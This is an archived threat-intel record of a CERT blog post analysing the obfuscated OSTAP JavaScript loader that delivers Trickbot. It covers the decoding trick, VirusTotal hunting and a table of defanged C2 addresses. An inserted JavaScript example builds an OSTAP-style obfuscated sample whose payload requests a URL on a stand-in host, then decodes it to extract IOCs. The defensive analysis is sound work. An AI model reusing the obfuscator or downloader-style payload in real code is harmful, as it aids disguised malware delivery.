{
	"id": "4a6ad11f-5138-4ad0-b307-24d7b43def1b",
	"created_at": "2026-04-06T00:13:11.803037Z",
	"updated_at": "2026-04-10T13:11:19.445331Z",
	"deleted_at": null,
	"sha1_hash": "e35664044820f76cc945d04d7512f74475962266",
	"title": "Deobfuscating and hunting for OSTAP, Trickbot’s dropper and best friend",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 61083,
	"plain_text": "Deobfuscating and hunting for OSTAP, Trickbot’s dropper and\r\nbest friend\r\nBy Equipe CERT\r\nPublished: 2020-04-14 · Archived: 2026-04-05 22:57:02 UTC\r\n[et_pb_section fb_built=”1″ admin_label=”section” _builder_version=”3.22″][et_pb_row admin_label=”row”\r\n_builder_version=”3.25″ background_size=”initial” background_position=”top_left” background_repeat=”repeat”\r\ncustom_margin=”|auto|-2px|auto||”][et_pb_column type=”4_4″ _builder_version=”3.25″ custom_padding=”|||”\r\ncustom_padding__hover=”|||”][et_pb_text admin_label=”Text” _builder_version=”4.4.2″ text_font=”Nunito\r\nSans||||||||” text_font_size=”16px” header_2_font=”Poppins||||||||” header_2_text_color=”#071793″\r\nheader_2_font_size=”31px” background_size=”initial” background_position=”top_left”\r\nbackground_repeat=”repeat” custom_padding=”||0px|||”]\r\nDuring a recent investigation dealing with ransomware attack, CERT Intrinsec faced OSTAP loader. This\r\nloader is used to deliver other malwares (such as Trickbot) on an infected system. It uses high obfuscation\r\ntechniques to prevent the code from being read and to bypass detection processes.\r\nObfuscated loader\r\n[/et_pb_text][et_pb_image src=\"https://www.intrinsec.com/wp-content/uploads/2020/04/fig1-1.png\"\r\n_builder_version=\"4.4.2\"][/et_pb_image][et_pb_text _builder_version=\"4.4.2\"]\r\nFigure 1 : Extract of the loader code (Javascript)\r\n[/et_pb_text][et_pb_text admin_label=”Text” _builder_version=”4.4.2″ text_font=”Nunito Sans||||||||”\r\ntext_font_size=”16px” header_2_font=”Poppins||||||||” header_2_text_color=”#071793″\r\nheader_2_font_size=”31px” background_size=”initial” background_position=”top_left”\r\nbackground_repeat=”repeat”]\r\nThe ostap loader (Figure 1) we analysed was about 10 000 lines long. We started the static analysis by going\r\nthrough the code by hand to understand its structure. 
We identified a key part of the code that helped us deobfuscate the loader (Figure 2).\r\n\r\nFigure 2 : Key part of the loader code [image: https://www.intrinsec.com/wp-content/uploads/2020/04/fig2-1.png]\r\n\r\nThe instructions in Figure 2 amount to calling String.fromCharCode on the ewnfBeth8 parameter. The program is padded with noise instructions. For example, the ppfhair_3(ewnfBeth8) call inside the try block can never succeed, because that function does not exist; this is deliberate, so that execution always falls into the catch block. Likewise, the etvulike2 parameter is always equal to ‘f’. A large part of the program is a concatenation of functions of the form shown in Figure 3.\r\n\r\nFigure 3 : Repeated function model [image: https://www.intrinsec.com/wp-content/uploads/2020/04/fig3-1.png]\r\n\r\nThe function in Figure 3 simply applies String.fromCharCode to 69, i.e. « E ». The program builds all of its instructions this way. 
Knowing that, we decided to write a script to extract each obfuscated character.\r\n\r\nDeobfuscation script\r\n\r\nThe main goal of the script is to get indicators of compromise out of the loader. It was developed in Node.js. It first walks through the obfuscated loader, retrieves the targeted numbers and applies String.fromCharCode to decode them. It then collects the indicators of compromise from the decoded payload using regular expressions. The extracted IOCs are IPs, URLs and User-Agents. The figure below shows the output of the script on a sample hunted on VirusTotal. At the top of Figure 4 we can see a list of targeted file extensions (the content of files with these extensions is replaced by the OSTAP JS code).\r\n\r\nFigure 4 : Script execution output [image: https://www.intrinsec.com/wp-content/uploads/2020/04/fig4.png]\r\n\r\nHunting\r\n\r\nAfter deobfuscating the loader as part of our investigation, we decided to hunt for recent, similar files on VirusTotal, using searches on static code patterns (content: “‘String’)[‘slice’]”, for instance). 
We found many samples (Figure 5) and processed them to extract as many IOCs as possible.\r\n\r\nFigure 5 : OSTAP samples from VirusTotal [image: https://www.intrinsec.com/wp-content/uploads/2020/04/fig5-1.png]\r\n\r\nWe collected about 140 samples from VirusTotal and ran the script on them. We analysed them and extracted the indicators of compromise listed in the table below. At least one of the IP addresses (185[.]234[.]73[.]125) is linked to the Trickbot campaign that has been exploiting the Coronavirus outbreak, for example in Italy, as reported by Sophos (1).\r\n\r\nIP                    URL\r\n141[.]98[.]214[.]14   hxxps[://]141[.]98[.]214[.]14/6BcsTO/AGVV5r[.]php\r\n185[.]159[.]82[.]205  hxxps[://]185[.]159[.]82[.]205/2/1[.]php\r\n185[.]216[.]35[.]10   hxxps[://]185[.]216[.]35[.]10/VYut68/L2KSUN[.]php\r\n185[.]234[.]73[.]125  hxxps[://]185[.]234[.]73[.]125/wMB03o/Wx9u79[.]php\r\n194[.]87[.]96[.]100   hxxps[://]194[.]87[.]96[.]100/2/1[.]php\r\n45[.]128[.]133[.]41   hxxp[://]45[.]128[.]133[.]41/jTlp8P/3OXkud[.]php\r\n91[.]196[.]70[.]126   hxxps[://]91[.]196[.]70[.]126/2/zsQX9M[.]php\r\n\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n\r\n
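The decode-then-regex workflow of the Deobfuscation script section, as an added, self-contained JavaScript example. This is not the Intrinsec ostap_deobfuscator script from reference 7 and it does not reproduce the real loader: it builds its own OSTAP-style sample from a cleartext string so that it runs offline, using a single wrapper in the Figure 3 model (a try branch that calls a function which is never defined, and a catch branch that does the String.fromCharCode), one call per character, concatenated with '+'. The wrapper name qzv4Kp, the cleartext payload, the RFC 5737 documentation address 203.0.113.10 and the URL path are all made up. Output is defanged in the same style as the table above.

```javascript
// Added example (not the Intrinsec ostap_deobfuscator script). A constructed
// OSTAP-style snippet is built from cleartext, then statically decoded and
// mined for IOCs. Wrapper name, payload, host and path are all made up;
// 203.0.113.10 is an RFC 5737 documentation address.

// Figure 3 model: the try branch calls a function that is never defined,
// so every call raises and the catch branch returns the decoded character.
function buildWrapper(name) {
  return 'function ' + name + '(n){try{notDefined_' + name + '(n)}catch(e){return String.fromCharCode(n)}}';
}

// Reverse of the deobfuscation, used only to construct a self-contained sample:
// one wrapper call per character of the cleartext, concatenated with '+'.
function obfuscate(cleartext, name) {
  const calls = Array.from(cleartext, ch => name + '(' + ch.charCodeAt(0) + ')');
  return buildWrapper(name) + ' var p=' + calls.join('+') + '; eval(p);';
}

// Constructed payload: the kind of code the loader would assemble and run.
const CLEARTEXT = `var ua='Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko';var x=new ActiveXObject('MSXML2.XMLHTTP');x.open('GET','https://203.0.113.10/aB12cd/Xy9z.php',false);x.setRequestHeader('User-Agent',ua);x.send();`;
const OBFUSCATED_SAMPLE = obfuscate(CLEARTEXT, 'qzv4Kp');

// Step 1: locate the wrapper by its shape (try/catch around String.fromCharCode),
// not by name, since the identifier differs from sample to sample.
function findWrapperName(src) {
  const m = src.match(/function ([A-Za-z0-9_]+)[(][A-Za-z0-9_]+[)][{]try[{][^}]*[}]catch[(][A-Za-z0-9_]+[)][{]return String[.]fromCharCode/);
  return m ? m[1] : null;
}

// Step 2: pull every numeric argument passed to the wrapper, in source order,
// and map each one through String.fromCharCode.
function deobfuscate(src) {
  const name = findWrapperName(src);
  if (name === null) throw new Error('no String.fromCharCode wrapper found');
  const callRe = new RegExp(name + '[(]([0-9]{1,5})[)]', 'g');
  let decoded = '';
  for (const m of src.matchAll(callRe)) decoded += String.fromCharCode(Number(m[1]));
  return decoded;
}

// Step 3: regex the decoded payload for IPs, URLs and User-Agents.
function extractIocs(decoded) {
  const uniq = arr => Array.from(new Set(arr));
  return {
    ips: uniq(decoded.match(/(?:[0-9]{1,3}[.]){3}[0-9]{1,3}/g) || []),
    urls: uniq(decoded.match(/https?:[/][/][^ ';)]+/g) || []),
    userAgents: uniq(decoded.match(/Mozilla[/][0-9.]+ [(][^)]*[)](?: like Gecko)?/g) || []),
  };
}

// Defang for reporting, in the same style as the IOC table (hxxps[://], [.]).
function defang(s) {
  return s.replace(/^http/, 'hxxp').replace('://', '[://]').replace(/[.]/g, '[.]');
}

function run(src) {
  const iocs = extractIocs(deobfuscate(src));
  return { ips: iocs.ips.map(defang), urls: iocs.urls.map(defang), userAgents: iocs.userAgents };
}

console.log(JSON.stringify(run(OBFUSCATED_SAMPLE), null, 2));
```

Run it with node; it prints the defanged IP, URL and User-Agent recovered from the constructed sample. Two design points carry over to real samples: the wrapper is found by shape rather than by name, because the identifier changes from sample to sample, and the decoder only assumes that the numeric calls appear in evaluation order and that there is a single wrapper. That is enough for this constructed input but not for the 10,000-line real loaders, where noise functions, several wrappers and reordered concatenation have to be handled; the scripts linked in references 5 and 7 are the place to look for that.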
References\r\n1. https://news.sophos.com/en-us/2020/03/04/trickbot-campaign-targets-coronavirus-fears-in-italy/\r\n2. https://www.esentire.com/blog/oh-snap-new-ostap-variant-observed-in-the-wild\r\n3. https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/\r\n4. https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/\r\n5. https://github.com/cryptogramfan/Malware-Analysis-Scripts\r\n6. https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\n7. Script on the Intrinsec GitHub: https://github.com/Intrinsec/CERT/tree/master/Scripts/ostap_deobfuscator\r\n\r\nSource: https://www.intrinsec.com/deobfuscating-hunting-ostap/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.intrinsec.com/deobfuscating-hunting-ostap/"
	],
	"report_names": [
		"deobfuscating-hunting-ostap"
	],
	"threat_actors": [],
	"ts_created_at": 1775434391,
	"ts_updated_at": 1775826679,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e35664044820f76cc945d04d7512f74475962266.pdf",
		"text": "https://archive.orkl.eu/e35664044820f76cc945d04d7512f74475962266.txt",
		"img": "https://archive.orkl.eu/e35664044820f76cc945d04d7512f74475962266.jpg"
	}
}